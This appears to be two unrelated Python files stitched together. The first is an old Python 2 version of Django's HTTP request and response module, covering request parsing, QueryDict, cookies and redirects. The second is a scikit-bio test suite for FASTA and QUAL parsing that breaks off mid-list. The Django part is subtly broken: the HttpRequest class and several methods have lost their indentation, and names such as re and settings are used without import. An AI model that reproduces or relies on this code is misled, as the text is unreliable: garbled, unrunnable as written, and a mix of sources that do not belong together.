from django.core.files import uploadhandler
from django.http.multipartparser import MultiPartParser
from django.http.utils import *
from django.utils.datastructures import MultiValueDict, ImmutableList
from django.utils.encoding import smart_str, iri_to_uri, force_unicode
from django.utils.http import cookie_date
RESERVED_CHARS="!*'();:@&=+$,/?%#[]"
# Matches absolute http(s) URLs, case-insensitively; used by
# build_absolute_uri() to decide whether a location needs joining.
absolute_http_url_re = re.compile(r"^https?://", re.I)
class Http404(Exception):
    """Exception signalling that a resource was not found (HTTP 404)."""
    pass
# Sentinel default for get_signed_cookie(): distinguishes "no default
# supplied" (re-raise the error) from an explicit default of None.
RAISE_ERROR = object()
def build_request_repr(request, path_override=None, GET_override=None,
                       POST_override=None, COOKIES_override=None,
                       META_override=None):
    """
    Builds and returns the request's representation string. The request's
    attributes may be overridden by pre-processed values.
    """
    # Since this is called as part of error handling, we need to be very
    # robust against potentially malformed input. The previous bare
    # `except:` clauses are narrowed to `except Exception:` so that
    # KeyboardInterrupt/SystemExit are no longer swallowed here.
    try:
        get = (pformat(GET_override)
               if GET_override is not None
               else pformat(request.GET))
    except Exception:
        get = '<could not parse>'
    if request._post_parse_error:
        post = '<could not parse>'
    else:
        try:
            post = (pformat(POST_override)
                    if POST_override is not None
                    else pformat(request.POST))
        except Exception:
            post = '<could not parse>'
    try:
        cookies = (pformat(COOKIES_override)
                   if COOKIES_override is not None
                   else pformat(request.COOKIES))
    except Exception:
        cookies = '<could not parse>'
    try:
        meta = (pformat(META_override)
                if META_override is not None
                else pformat(request.META))
    except Exception:
        meta = '<could not parse>'
    path = path_override if path_override is not None else request.path
    return smart_str(u'<%s\npath:%s,\nGET:%s,\nPOST:%s,\nCOOKIES:%s,\nMETA:%s>' %
                     (request.__class__.__name__,
                      path,
                      unicode(get),
                      unicode(post),
                      unicode(cookies),
                      unicode(meta)))
class UnreadablePostError(IOError):
    """Raised when reading the request body fails (see HttpRequest.body)."""
    pass
class HttpRequest(object):
"""A basic HTTP request."""
# The encoding used in GET/POST dicts. None means use default setting.
_encoding = None
_upload_handlers = []
def __init__(self):
self.GET, self.POST, self.COOKIES, self.META, self.FILES = {}, {}, {}, {}, {}
self.path = ''
self.path_info = ''
self.method = None
self._post_parse_error = False
def __repr__(self):
return build_request_repr(self)
def get_host(self):
"""Returns the HTTP host using the environment or request headers."""
# We try three options, in order of decreasing preference.
if settings.USE_X_FORWARDED_HOST and (
'HTTP_X_FORWARDED_HOST' in self.META):
host = self.META['HTTP_X_FORWARDED_HOST']
elif 'HTTP_HOST' in self.META:
host = self.META['HTTP_HOST']
else:
# Reconstruct the host using the algorithm from PEP 333.
host = self.META['SERVER_NAME']
server_port = str(self.META['SERVER_PORT'])
if server_port != (self.is_secure() and '443' or '80'):
host = '%s:%s' % (host, server_port)
return host
def get_full_path(self):
# RFC 3986 requires query string arguments to be in the ASCII range.
# Rather than crash if this doesn't happen, we encode defensively.
return '%s%s' % (self.path, self.META.get('QUERY_STRING', '') and ('?' + iri_to_uri(self.META.get('QUERY_STRING', ''))) or '')
def get_signed_cookie(self, key, default=RAISE_ERROR, salt='', max_age=None):
"""
Attempts to return a signed cookie. If the signature fails or the
cookie has expired, raises an exception... unless you provide the
default argument in which case that value will be returned instead.
"""
try:
cookie_value = self.COOKIES[key].encode('utf-8')
except KeyError:
if default is not RAISE_ERROR:
return default
else:
raise
try:
value = signing.get_cookie_signer(salt=key + salt).unsign(
cookie_value, max_age=max_age)
except signing.BadSignature:
if default is not RAISE_ERROR:
return default
else:
raise
return value
def build_absolute_uri(self, location=None):
"""
Builds an absolute URI from the location and the variables available in
this request. If no location is specified, the absolute URI is built on
``request.get_full_path()``.
"""
if not location:
location = self.get_full_path()
if not absolute_http_url_re.match(location):
current_uri = '%s://%s%s' % (self.is_secure() and 'https' or 'http',
self.get_host(), self.path)
location = urljoin(current_uri, location)
return iri_to_uri(location)
def _is_secure(self):
return os.environ.get("HTTPS") == "on"
def is_secure(self):
# First, check the SECURE_PROXY_SSL_HEADER setting.
if settings.SECURE_PROXY_SSL_HEADER:
try:
header, value = settings.SECURE_PROXY_SSL_HEADER
except ValueError:
raise ImproperlyConfigured('The SECURE_PROXY_SSL_HEADER setting must be a tuple containing two values.')
if self.META.get(header, None) == value:
return True
# Failing that, fall back to _is_secure(), which is a hook for
# subclasses to implement.
return self._is_secure()
def is_ajax(self):
return self.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest'
def _set_encoding(self, val):
"""
Sets the encoding used for GET/POST accesses. If the GET or POST
dictionary has already been created, it is removed and recreated on the
next access (so that it is decoded correctly).
"""
self._encoding = val
if hasattr(self, '_get'):
del self._get
if hasattr(self, '_post'):
del self._post
def _get_encoding(self):
return self._encoding
encoding = property(_get_encoding, _set_encoding)
def _initialize_handlers(self):
self._upload_handlers = [uploadhandler.load_handler(handler, self)
for handler in settings.FILE_UPLOAD_HANDLERS]
def _set_upload_handlers(self, upload_handlers):
if hasattr(self, '_files'):
raise AttributeError("You cannot set the upload handlers after the upload has been processed.")
self._upload_handlers = upload_handlers
def _get_upload_handlers(self):
if not self._upload_handlers:
# If there are no upload handlers defined, initialize them from settings.
self._initialize_handlers()
return self._upload_handlers
upload_handlers = property(_get_upload_handlers, _set_upload_handlers)
def parse_file_upload(self, META, post_data):
"""Returns a tuple of (POST QueryDict, FILES MultiValueDict)."""
self.upload_handlers = ImmutableList(
self.upload_handlers,
warning = "You cannot alter upload handlers after the upload has been processed."
)
parser = MultiPartParser(META, post_data, self.upload_handlers, self.encoding)
return parser.parse()
@property
def body(self):
if not hasattr(self, '_body'):
if self._read_started:
raise Exception("You cannot access body after reading from request's data stream")
try:
self._body = self.read()
except IOError, e:
raise UnreadablePostError, e, sys.exc_traceback
self._stream = StringIO(self._body)
return self._body
@property
def raw_post_data(self):
warnings.warn('HttpRequest.raw_post_data has been deprecated. Use HttpRequest.body instead.', PendingDeprecationWarning)
return self.body
def _mark_post_parse_error(self):
self._post = QueryDict('')
self._files = MultiValueDict()
self._post_parse_error = True
def _load_post_and_files(self):
    """Populate self._post and self._files from the request body."""
    # Populates self._post and self._files
    if self.method != 'POST':
        self._post, self._files = QueryDict('', encoding=self._encoding), MultiValueDict()
        return
    if self._read_started and not hasattr(self, '_body'):
        # Stream already consumed and nothing cached: parsing is impossible.
        self._mark_post_parse_error()
        return

    if self.META.get('CONTENT_TYPE', '').startswith('multipart'):
        if hasattr(self, '_body'):
            # Use already read data
            data = StringIO(self._body)
        else:
            data = self
        try:
            self._post, self._files = self.parse_file_upload(self.META, data)
        except:
            # An error occured while parsing POST data. Since when
            # formatting the error the request handler might access
            # self.POST, set self._post and self._file to prevent
            # attempts to parse POST data again.
            # Mark that an error occured. This allows self.__repr__ to
            # be explicit about it instead of simply representing an
            # empty POST
            self._mark_post_parse_error()
            raise
    else:
        self._post, self._files = QueryDict(self.body, encoding=self._encoding), MultiValueDict()
## File-like and iterator interface.
##
## Expects self._stream to be set to an appropriate source of bytes by
## a corresponding request subclass (WSGIRequest or ModPythonRequest).
## Also when request data has already been read by request.POST or
## request.body, self._stream points to a StringIO instance
## containing that data.

def read(self, *args, **kwargs):
    """Read from the underlying stream, marking the stream as consumed."""
    self._read_started = True
    return self._stream.read(*args, **kwargs)
def readline(self, *args, **kwargs):
    """Read one line from the stream, marking the stream as consumed."""
    self._read_started = True
    return self._stream.readline(*args, **kwargs)
def xreadlines(self):
    """Yield successive lines from the request until EOF."""
    line = self.readline()
    while line:
        yield line
        line = self.readline()

__iter__ = xreadlines
def readlines(self):
    """Return all remaining lines of the request as a list."""
    return [line for line in self]
class QueryDict(MultiValueDict):
    """
    A specialized MultiValueDict that takes a query string when initialized.
    This is immutable unless you create a copy of it.

    Values retrieved from this class are converted from the given encoding
    (DEFAULT_CHARSET by default) to unicode.
    """
    # These are both reset in __init__, but is specified here at the class
    # level so that unpickling will have valid values
    _mutable = True
    _encoding = None

    def __init__(self, query_string, mutable=False, encoding=None):
        MultiValueDict.__init__(self)
        if not encoding:
            encoding = settings.DEFAULT_CHARSET
        self.encoding = encoding
        for key, value in parse_qsl((query_string or ''), True):  # keep_blank_values=True
            self.appendlist(force_unicode(key, encoding, errors='replace'),
                            force_unicode(value, encoding, errors='replace'))
        # Set mutability last so the appendlist() calls above are allowed.
        self._mutable = mutable

    def _get_encoding(self):
        # Lazily fall back to the project-wide default charset.
        if self._encoding is None:
            self._encoding = settings.DEFAULT_CHARSET
        return self._encoding

    def _set_encoding(self, value):
        self._encoding = value

    encoding = property(_get_encoding, _set_encoding)

    def _assert_mutable(self):
        # Guard used by every mutating method below.
        if not self._mutable:
            raise AttributeError("This QueryDict instance is immutable")

    def __setitem__(self, key, value):
        self._assert_mutable()
        key = str_to_unicode(key, self.encoding)
        value = str_to_unicode(value, self.encoding)
        MultiValueDict.__setitem__(self, key, value)

    def __delitem__(self, key):
        self._assert_mutable()
        super(QueryDict, self).__delitem__(key)

    def __copy__(self):
        # Copies are always mutable, regardless of the source's mutability.
        result = self.__class__('', mutable=True, encoding=self.encoding)
        for key, value in dict.items(self):
            dict.__setitem__(result, key, value)
        return result

    def __deepcopy__(self, memo):
        import copy
        result = self.__class__('', mutable=True, encoding=self.encoding)
        memo[id(self)] = result
        for key, value in dict.items(self):
            dict.__setitem__(result, copy.deepcopy(key, memo), copy.deepcopy(value, memo))
        return result

    def setlist(self, key, list_):
        self._assert_mutable()
        key = str_to_unicode(key, self.encoding)
        list_ = [str_to_unicode(elt, self.encoding) for elt in list_]
        MultiValueDict.setlist(self, key, list_)

    def setlistdefault(self, key, default_list=()):
        self._assert_mutable()
        if key not in self:
            self.setlist(key, default_list)
        return MultiValueDict.getlist(self, key)

    def appendlist(self, key, value):
        self._assert_mutable()
        key = str_to_unicode(key, self.encoding)
        value = str_to_unicode(value, self.encoding)
        MultiValueDict.appendlist(self, key, value)

    def update(self, other_dict):
        self._assert_mutable()
        f = lambda s: str_to_unicode(s, self.encoding)
        if hasattr(other_dict, 'lists'):
            # MultiValueDict-like source: preserve every value of each key.
            for key, valuelist in other_dict.lists():
                for value in valuelist:
                    MultiValueDict.update(self, {f(key): f(value)})
        else:
            d = dict([(f(k), f(v)) for k, v in other_dict.items()])
            MultiValueDict.update(self, d)

    def pop(self, key, *args):
        self._assert_mutable()
        return MultiValueDict.pop(self, key, *args)

    def popitem(self):
        self._assert_mutable()
        return MultiValueDict.popitem(self)

    def clear(self):
        self._assert_mutable()
        MultiValueDict.clear(self)

    def setdefault(self, key, default=None):
        self._assert_mutable()
        key = str_to_unicode(key, self.encoding)
        default = str_to_unicode(default, self.encoding)
        return MultiValueDict.setdefault(self, key, default)

    def copy(self):
        """Returns a mutable copy of this object."""
        return self.__deepcopy__({})

    def urlencode(self, safe=None):
        """
        Returns an encoded string of all query string arguments.

        :arg safe: Used to specify characters which do not require quoting, for
            example::

                >>> q = QueryDict('', mutable=True)
                >>> q['next'] = '/a&b/'
                >>> q.urlencode()
                'next=%2Fa%26b%2F'
                >>> q.urlencode(safe='/')
                'next=/a%26b/'
        """
        output = []
        if safe:
            encode = lambda k, v: '%s=%s' % ((quote(k, safe), quote(v, safe)))
        else:
            encode = lambda k, v: urlencode({k: v})
        for k, list_ in self.lists():
            k = smart_str(k, self.encoding)
            output.extend([encode(k, smart_str(v, self.encoding))
                           for v in list_])
        return '&'.join(output)
def parse_cookie(cookie):
    """
    Convert a raw ``Cookie`` header string (or an existing BaseCookie)
    into a plain dict mapping cookie names to their values.

    Malformed cookie strings yield an empty dict.
    """
    if cookie == '':
        return {}
    if isinstance(cookie, Cookie.BaseCookie):
        c = cookie
    else:
        try:
            c = SimpleCookie()
            c.load(cookie)
        except Cookie.CookieError:
            # Invalid cookie
            return {}
    result = {}
    for name in c.keys():
        result[name] = c[name].value
    return result
class BadHeaderError(ValueError):
    """Raised when a header value contains characters that are not allowed."""
    pass
class HttpResponse(object):
    """A basic HTTP response, with content and dictionary-accessed headers."""

    status_code = 200

    def __init__(self, content='', mimetype=None, status=None,
                 content_type=None):
        # _headers is a mapping of the lower-case name to the original case of
        # the header (required for working with legacy systems) and the header
        # value. Both the name of the header and its value are ASCII strings.
        self._headers = {}
        self._charset = settings.DEFAULT_CHARSET
        if mimetype:  # For backwards compatibility.
            content_type = mimetype
        if not content_type:
            content_type = "%s; charset=%s" % (settings.DEFAULT_CONTENT_TYPE,
                                               self._charset)
        self.content = content
        self.cookies = SimpleCookie()
        if status:
            self.status_code = status
        self['Content-Type'] = content_type

    def __str__(self):
        """Full HTTP message, including headers."""
        return '\n'.join(['%s: %s' % (key, value)
                          for key, value in self._headers.values()]) \
            + '\n\n' + self.content

    def _convert_to_ascii(self, *values):
        """Converts all values to ascii strings."""
        # Generator: yields each value as a plain ASCII str, raising on
        # non-ASCII text or embedded CR/LF (header-injection guard).
        for value in values:
            if isinstance(value, unicode):
                try:
                    value = value.encode('us-ascii')
                except UnicodeError, e:
                    e.reason += ', HTTP response headers must be in US-ASCII format'
                    raise
            else:
                value = str(value)
            if '\n' in value or '\r' in value:
                raise BadHeaderError("Header values can't contain newlines (got %r)" % (value))
            yield value

    def __setitem__(self, header, value):
        header, value = self._convert_to_ascii(header, value)
        self._headers[header.lower()] = (header, value)

    def __delitem__(self, header):
        # Deleting a missing header is a silent no-op.
        try:
            del self._headers[header.lower()]
        except KeyError:
            pass

    def __getitem__(self, header):
        return self._headers[header.lower()][1]

    def __getstate__(self):
        # SimpleCookie is not pickeable with pickle.HIGHEST_PROTOCOL, so we
        # serialise to a string instead
        state = self.__dict__.copy()
        state['cookies'] = str(state['cookies'])
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        # Rebuild the SimpleCookie from the string stored by __getstate__.
        self.cookies = SimpleCookie(self.cookies)

    def has_header(self, header):
        """Case-insensitive check for a header."""
        return header.lower() in self._headers

    __contains__ = has_header

    def items(self):
        # (original-case name, value) pairs for every header.
        return self._headers.values()

    def get(self, header, alternate=None):
        # Case-insensitive header lookup with a default.
        return self._headers.get(header.lower(), (None, alternate))[1]

    def set_cookie(self, key, value='', max_age=None, expires=None, path='/',
                   domain=None, secure=False, httponly=False):
        """
        Sets a cookie.

        ``expires`` can be a string in the correct format or a
        ``datetime.datetime`` object in UTC. If ``expires`` is a datetime
        object then ``max_age`` will be calculated.
        """
        self.cookies[key] = value
        if expires is not None:
            if isinstance(expires, datetime.datetime):
                # NOTE(review): assumes ``expires`` is a naive UTC datetime --
                # subtracting utcnow() from an aware datetime raises TypeError.
                delta = expires - expires.utcnow()
                # Add one second so the date matches exactly (a fraction of
                # time gets lost between converting to a timedelta and
                # then the date string).
                delta = delta + datetime.timedelta(seconds=1)
                # Just set max_age - the max_age logic will set expires.
                expires = None
                max_age = max(0, delta.days * 86400 + delta.seconds)
            else:
                self.cookies[key]['expires'] = expires
        if max_age is not None:
            self.cookies[key]['max-age'] = max_age
            # IE requires expires, so set it if hasn't been already.
            if not expires:
                self.cookies[key]['expires'] = cookie_date(time.time() +
                                                           max_age)
        if path is not None:
            self.cookies[key]['path'] = path
        if domain is not None:
            self.cookies[key]['domain'] = domain
        if secure:
            self.cookies[key]['secure'] = True
        if httponly:
            self.cookies[key]['httponly'] = True

    def set_signed_cookie(self, key, value, salt='', **kwargs):
        # Sign the value (keyed on cookie name + salt) before storing it.
        value = signing.get_cookie_signer(salt=key + salt).sign(value)
        return self.set_cookie(key, value, **kwargs)

    def delete_cookie(self, key, path='/', domain=None):
        # Expire the cookie in the past so clients discard it immediately.
        self.set_cookie(key, max_age=0, path=path, domain=domain,
                        expires='Thu, 01-Jan-1970 00:00:00 GMT')

    def _get_content(self):
        if self.has_header('Content-Encoding'):
            # Encoded payloads are raw bytes; don't re-encode with charset.
            return ''.join([str(e) for e in self._container])
        return ''.join([smart_str(e, self._charset) for e in self._container])

    def _set_content(self, value):
        # Iterables are stored as-is (streamed); anything else is wrapped.
        if hasattr(value, '__iter__'):
            self._container = value
            self._base_content_is_iter = True
        else:
            self._container = [value]
            self._base_content_is_iter = False

    content = property(_get_content, _set_content)

    def __iter__(self):
        self._iterator = iter(self._container)
        return self

    def next(self):
        # Python 2 iterator protocol: emit content chunks as bytestrings.
        chunk = self._iterator.next()
        if isinstance(chunk, unicode):
            chunk = chunk.encode(self._charset)
        return str(chunk)

    def close(self):
        if hasattr(self._container, 'close'):
            self._container.close()

    # The remaining methods partially implement the file-like object interface.
    # See http://docs.python.org/lib/bltin-file-objects.html
    def write(self, content):
        if self._base_content_is_iter:
            raise Exception("This %s instance is not writable" % self.__class__)
        self._container.append(content)

    def flush(self):
        pass

    def tell(self):
        if self._base_content_is_iter:
            raise Exception("This %s instance cannot tell its position" % self.__class__)
        return sum([len(str(chunk)) for chunk in self._container])
class HttpResponseRedirect(HttpResponse):
    """Temporary (302) redirect to the given URL."""
    status_code = 302

    def __init__(self, redirect_to):
        super(HttpResponseRedirect, self).__init__()
        # Convert an IRI to a fully-quoted URI for the Location header.
        self['Location'] = iri_to_uri(redirect_to)
class HttpResponsePermanentRedirect(HttpResponse):
    """Permanent (301) redirect to the given URL."""
    status_code = 301

    def __init__(self, redirect_to):
        super(HttpResponsePermanentRedirect, self).__init__()
        # Convert an IRI to a fully-quoted URI for the Location header.
        self['Location'] = iri_to_uri(redirect_to)
class HttpResponseNotModified(HttpResponse):
    """304 Not Modified."""
    status_code = 304

class HttpResponseBadRequest(HttpResponse):
    """400 Bad Request."""
    status_code = 400

class HttpResponseNotFound(HttpResponse):
    """404 Not Found."""
    status_code = 404

class HttpResponseForbidden(HttpResponse):
    """403 Forbidden."""
    status_code = 403

class HttpResponseNotAllowed(HttpResponse):
    """405 Method Not Allowed; advertises the permitted methods via Allow."""
    status_code = 405

    def __init__(self, permitted_methods):
        super(HttpResponseNotAllowed, self).__init__()
        self['Allow'] = ', '.join(permitted_methods)

class HttpResponseGone(HttpResponse):
    """410 Gone."""
    status_code = 410

class HttpResponseServerError(HttpResponse):
    """500 Internal Server Error."""
    status_code = 500
# A backwards compatible alias for HttpRequest.get_host.
def get_host(request):
    """Module-level compatibility alias; delegates to request.get_host()."""
    return request.get_host()
# It's neither necessary nor appropriate to use
# django.utils.encoding.smart_unicode for parsing URLs and form inputs. Thus,
# this slightly more restricted function.
def str_to_unicode(s, encoding):
    """
    Convert a bytestring to unicode using the given encoding; bytes that
    cannot be decoded are replaced with the Unicode REPLACEMENT CHARACTER
    (U+FFFD).

    Any non-bytestring object is returned unchanged.
    """
    if not isinstance(s, str):
        return s
    return unicode(s, encoding, 'replace')
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
from future.builtins import map, range, zip
import six
import io
from unittest import TestCase, main
from functools import partial
import numpy as np
from skbio import (Sequence, DNA, RNA, Protein, SequenceCollection, Alignment)
from skbio.io import FASTAFormatError, QUALFormatError
from skbio.io.format.fasta import (
_fasta_sniffer, _fasta_to_generator, _fasta_to_biological_sequence,
_fasta_to_dna_sequence, _fasta_to_rna_sequence, _fasta_to_protein_sequence,
_fasta_to_sequence_collection, _fasta_to_alignment, _generator_to_fasta,
_biological_sequence_to_fasta, _dna_sequence_to_fasta,
_rna_sequence_to_fasta, _protein_sequence_to_fasta,
_sequence_collection_to_fasta, _alignment_to_fasta)
from skbio.util import get_data_path
class SnifferTests(TestCase):
    """Exercise the FASTA sniffer against positive and negative fixtures."""

    def setUp(self):
        positive_names = [
            'fasta_5_blanks_start_of_file',
            'fasta_5_ws_lines_start_of_file',
            'fasta_blanks_end_of_file',
            'fasta_ws_lines_end_of_file',
            'fasta_blank_lines_between_records',
            'fasta_3_seqs_defaults',
            'fasta_max_width_1',
            'fasta_single_bio_seq_non_defaults',
            'fasta_single_prot_seq_non_defaults',
            'fasta_3_seqs_non_defaults',
            'fasta_max_width_5',
            'fasta_single_dna_seq_defaults',
            'fasta_single_rna_seq_defaults',
            'fasta_description_newline_replacement_empty_str',
            'fasta_multi_seq',
            'fasta_single_dna_seq_non_defaults',
            'fasta_single_rna_seq_non_defaults',
            'fasta_description_newline_replacement_multi_char',
            'fasta_prot_seqs_odd_labels',
            'fasta_single_seq',
            'fasta_id_whitespace_replacement_empty_str',
            'fasta_sequence_collection_different_type',
            'fasta_id_whitespace_replacement_multi_char',
            'fasta_single_bio_seq_defaults',
            'fasta_single_prot_seq_defaults',
            'fasta_10_seqs',
            'fasta_invalid_after_10_seqs',
            'fasta_mixed_qual_scores',
            'qual_3_seqs_non_defaults'
        ]
        negative_names = [
            'empty',
            'whitespace_only',
            'fasta_invalid_missing_header',
            'fasta_invalid_blank_line_after_header',
            'fasta_invalid_blank_sequence',
            'fasta_invalid_blank_line_within_sequence',
            'fasta_invalid_whitespace_only_line_within_sequence',
            'fasta_invalid_whitespace_line_after_header',
            'fasta_invalid_missing_seq_data_first',
            'fasta_invalid_missing_seq_data_middle',
            'fasta_invalid_missing_seq_data_last',
            'fasta_invalid_legacy_format',
            'fasta_invalid_whitespace_only_sequence',
            'fasta_id_whitespace_replacement_none',
            'fasta_description_newline_replacement_none',
            'fasta_6_blanks_start_of_file',
            'fasta_6_ws_lines_start_of_file',
            'qual_2_seqs_defaults',
            'qual_3_seqs_defaults',
            'qual_3_seqs_defaults_desc_mismatch',
            'qual_3_seqs_defaults_extra',
            'qual_3_seqs_defaults_id_mismatch',
            'qual_3_seqs_defaults_length_mismatch',
            'qual_description_newline_replacement_empty_str',
            'qual_description_newline_replacement_multi_char',
            'qual_description_newline_replacement_none',
            'qual_id_whitespace_replacement_empty_str',
            'qual_id_whitespace_replacement_multi_char',
            'qual_id_whitespace_replacement_none',
            'qual_invalid_blank_line_within_seq',
            'qual_invalid_legacy_format',
            'qual_invalid_missing_header',
            'qual_invalid_missing_qual_scores_first',
            'qual_invalid_missing_qual_scores_last',
            'qual_invalid_missing_qual_scores_middle',
            'qual_invalid_whitespace_line_in_seq',
            'qual_invalid_blank_line_after_header',
            'qual_invalid_blank_sequence',
            'qual_invalid_whitespace_only_sequence',
            'qual_invalid_ws_line_after_header',
            'qual_invalid_qual_scores_float',
            'qual_invalid_qual_scores_string',
            'qual_max_width_1',
            'qual_max_width_5',
            'qual_multi_seq',
            'qual_multi_seq_roundtrip',
            'qual_prot_seqs_odd_labels',
            'qual_sequence_collection_different_type',
            'qual_single_bio_seq_non_defaults',
            'qual_single_dna_seq_non_defaults',
            'qual_single_prot_seq_non_defaults',
            'qual_single_rna_seq_non_defaults',
            'qual_single_seq',
            'qual_ws_lines_between_records',
            'qual_blank_lines_between_records',
            'qual_5_blanks_start_of_file',
            'qual_5_ws_lines_start_of_file',
            'qual_6_blanks_start_of_file',
            'qual_6_ws_lines_start_of_file',
            'qual_blanks_end_of_file',
            'qual_ws_lines_end_of_file'
        ]
        self.positive_fps = [get_data_path(name) for name in positive_names]
        self.negative_fps = [get_data_path(name) for name in negative_names]

    def test_positives(self):
        for fp in self.positive_fps:
            self.assertEqual(_fasta_sniffer(fp), (True, {}))

    def test_negatives(self):
        for fp in self.negative_fps:
            self.assertEqual(_fasta_sniffer(fp), (False, {}))
class ReaderTests(TestCase):
def setUp(self):
    """Build the expected-result fixtures shared by all reader tests."""
    # each structure stores the sequence generator results (expanded into a
    # list) that we expect to obtain from reading, matched with kwargs to
    # pass to the reader, and fasta and qual filepaths that should
    # deserialize into the expected generator results

    # empty file shouldn't yield sequences
    self.empty = ([], {}, list(map(get_data_path, ['empty',
                                                   'whitespace_only'])),
                  list(map(get_data_path, ['empty', 'whitespace_only'])))

    # single sequence
    self.single = (
        [Sequence(
            'ACGT-acgt.', metadata={'id': 'seq1', 'description': 'desc1'},
            positional_metadata={'quality':
                                 np.asarray([10, 20, 30, 10, 0, 0, 0, 255,
                                             1, 255], dtype=np.uint8)})],
        {},
        list(map(get_data_path, ['fasta_single_seq',
                                 'fasta_max_width_1'])),
        list(map(get_data_path, ['qual_single_seq', 'qual_max_width_1']))
    )

    # multiple sequences
    self.multi = (
        [Sequence(
            'ACGT-acgt.', metadata={'id': 'seq1', 'description': 'desc1'},
            positional_metadata={'quality':
                                 np.asarray([10, 20, 30, 10, 0, 0, 0, 255,
                                             1, 255], dtype=np.uint8)}),
         Sequence('A', metadata={'id': '_____seq__2_', 'description': ''},
                  positional_metadata={'quality':
                                       np.asarray([42], dtype=np.uint8)}),
         Sequence(
            'AACGGuA', metadata={'id': '', 'description': 'desc3'},
            positional_metadata={'quality':
                                 np.asarray([0, 0, 0, 0, 0, 0, 0],
                                            dtype=np.uint8)}),
         Sequence(
            'ACGTTGCAccGG',
            metadata={'id': '', 'description': ''},
            positional_metadata={'quality':
                                 np.asarray([55, 10, 0, 99, 1, 1, 8, 77,
                                             40, 10, 10, 0],
                                            dtype=np.uint8)}),
         Sequence('ACGUU',
                  metadata={'id': '', 'description': ''},
                  positional_metadata={'quality':
                                       np.asarray([10, 9, 8, 7, 6],
                                                  dtype=np.uint8)}),
         Sequence(
            'pQqqqPPQQQ',
            metadata={'id': 'proteinseq',
                      'description':
                          'detailed description \t\twith new lines'},
            positional_metadata={'quality':
                                 np.asarray([42, 42, 255, 255, 42, 42, 42,
                                             42, 42, 43],
                                            dtype=np.uint8)})],
        {},
        list(map(get_data_path, ['fasta_multi_seq', 'fasta_max_width_5',
                                 'fasta_blank_lines_between_records',
                                 'fasta_ws_lines_between_records',
                                 'fasta_5_blanks_start_of_file',
                                 'fasta_5_ws_lines_start_of_file',
                                 'fasta_6_blanks_start_of_file',
                                 'fasta_6_ws_lines_start_of_file',
                                 'fasta_blanks_end_of_file',
                                 'fasta_ws_lines_end_of_file'])),
        list(map(get_data_path, ['qual_multi_seq', 'qual_max_width_5',
                                 'qual_blank_lines_between_records',
                                 'qual_ws_lines_between_records',
                                 'qual_5_blanks_start_of_file',
                                 'qual_5_ws_lines_start_of_file',
                                 'qual_6_blanks_start_of_file',
                                 'qual_6_ws_lines_start_of_file',
                                 'qual_blanks_end_of_file',
                                 'qual_ws_lines_end_of_file']))
    )

    # test constructor parameter, as well as odd labels (label only
    # containing whitespace, label description preceded by multiple spaces,
    # no id) and leading/trailing whitespace on sequence data. for qual
    # files, in addition to the odd labels, test leading/trailing
    # whitespace on qual scores, as well as strange number formatting.
    # also test that fasta and qual headers do not need to match
    # exactly, only that they need to match exactly after parsing (e.g.,
    # after stripping leading/trailing whitespace from descriptions)
    self.odd_labels_different_type = (
        [Protein('DEFQfp',
                 metadata={'id': '', 'description': ''},
                 positional_metadata={'quality':
                                      np.asarray([0, 0, 1, 5, 44, 0],
                                                 dtype=np.uint8)},
                 validate=False),
         Protein(
            'SKBI', metadata={'id': '', 'description': 'skbio'},
            positional_metadata={'quality':
                                 np.asarray([1, 2, 33, 123],
                                            dtype=np.uint8)})],
        {'constructor': partial(Protein, validate=False)},
        list(map(get_data_path, ['fasta_prot_seqs_odd_labels'])),
        list(map(get_data_path, ['qual_prot_seqs_odd_labels']))
    )

    # sequences that can be loaded into a SequenceCollection or Alignment.
    # they are also a different type than Sequence in order to
    # exercise the constructor parameter
    self.sequence_collection_different_type = (
        [RNA('aUG',
             metadata={'id': '', 'description': ''},
             positional_metadata={'quality':
                                  np.asarray([20, 20, 21],
                                             dtype=np.uint8)},
             lowercase='introns'),
         RNA('AuC',
             metadata={'id': 'rnaseq-1', 'description': 'rnaseq desc 1'},
             positional_metadata={'quality':
                                  np.asarray([10, 9, 10], dtype=np.uint8)},
             lowercase='introns'),
         RNA('AUg',
             metadata={'id': 'rnaseq-2', 'description': 'rnaseq desc 2'},
             positional_metadata={'quality':
                                  np.asarray([9, 99, 99], dtype=np.uint8)},
             lowercase='introns')],
        {'constructor': partial(RNA, lowercase='introns')},
        list(map(get_data_path,
                 ['fasta_sequence_collection_different_type'])),
        list(map(get_data_path,
                 ['qual_sequence_collection_different_type']))
    )

    self.lowercase_seqs = (
        [DNA('TAcg',
             metadata={'id': 'f-o-o', 'description': 'b_a_r'},
             positional_metadata={'quality':
                                  np.asarray([0, 1, 2, 3],
                                             dtype=np.uint8)},
             lowercase='introns')],
        {'constructor': DNA, 'lowercase': 'introns'},
        list(map(get_data_path,
                 ['fasta_single_dna_seq_non_defaults'])),
        list(map(get_data_path,
                 ['qual_single_dna_seq_non_defaults']))
    )

    # store fasta filepath, kwargs, error type, and expected error message
    # for invalid input.
    #
    # note: there is some duplication in testing that fasta and qual
    # parsers raise expected errors. even though the parsers share the same
    # underlying logic, these tests are here as a safeguard in case the
    # code is refactored in the future such that fasta and qual have
    # different implementations (e.g., if qual is written in cython while
    # fasta remains in python)
    self.invalid_fps = list(map(lambda e: (get_data_path(e[0]),
                                           e[1], e[2], e[3]), [
        # fasta and qual missing header
        ('fasta_invalid_missing_header', {}, FASTAFormatError,
         'non-header.*1st'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_missing_header')},
         QUALFormatError, 'non-header.*1st'),

        # fasta and qual with blank line within sequence
        ('fasta_invalid_blank_line_within_sequence', {}, FASTAFormatError,
         'whitespace-only'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_blank_line_within_seq')},
         QUALFormatError, 'whitespace-only'),

        # fasta and qual with blank after header
        ('fasta_invalid_blank_sequence', {}, FASTAFormatError,
         'without sequence data'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_blank_sequence')},
         QUALFormatError, 'without quality scores'),

        # fasta and qual with whitespace only sequence
        ('fasta_invalid_whitespace_only_sequence', {}, FASTAFormatError,
         'without sequence data'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_whitespace_only_sequence')},
         QUALFormatError, 'without quality scores'),

